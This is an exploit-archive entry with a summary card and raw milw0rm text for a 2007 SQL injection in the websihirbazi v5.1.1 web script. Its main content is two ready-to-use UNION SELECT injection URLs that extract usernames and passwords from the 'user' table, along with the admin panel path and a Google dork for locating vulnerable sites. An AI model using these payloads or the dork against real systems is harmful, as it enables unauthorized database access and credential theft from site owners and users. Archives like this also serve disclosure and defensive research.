header-logo
Suggest Exploit
vendor:
websihirbazi
by:
bypas
7.5
CVSS
HIGH
Remote Blind SQL Injection
CWE
Product Name: websihirbazi
Affected Version From: websihirbazi v5.1.1
Affected Version To: websihirbazi v5.1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

websihirbazi v5.1.1 Remote Blind SQL Injection Vulnerability

The websihirbazi v5.1.1 script is vulnerable to a remote blind SQL injection attack. An attacker can exploit this vulnerability to extract sensitive information from the database.

Mitigation:

Upgrade to a patched version of the websihirbazi script.
Source

Exploit-DB raw data:

_________________________________________________________________________________
 ||----------------------------------------------------------------------
 |# Title : websihirbazi v5.1.1 Remote Blind SQL Injection Vulnerability|
 ||----------------------------------------------------------------------
 |# AUTHOR: bypas |
 ||----------------------------------------------------------------------
 |# script name : websihirbazi v5.1.1  | 200$ |
 ||----------------------------------------------------------------------
 |# scritp web page : http://www.sitehazirla.org |
 ||----------------------------------------------------------------------
 |# script admin panel : http://victim/script_path/yonetim |
 ||----------------------------------------------------------------------
 |# Google dork : |Powered By WebSihirbazı
 ||----------------------------------------------------------------------
 |# Message Tr : Hayat İllegal - / - bir daha taklit iş yapmayın emege saygılı olun |
 ||----------------------------------------------------------------------
_________________________________________________________________________________

< / ----------------------------------------------------------------------------- />


< / ------   Example sql bug  :   ------ / > 


http://[target]/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user


http://[target]/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user


< / ----------------------------------------------------------------------------- />

# milw0rm.com [2007-12-24]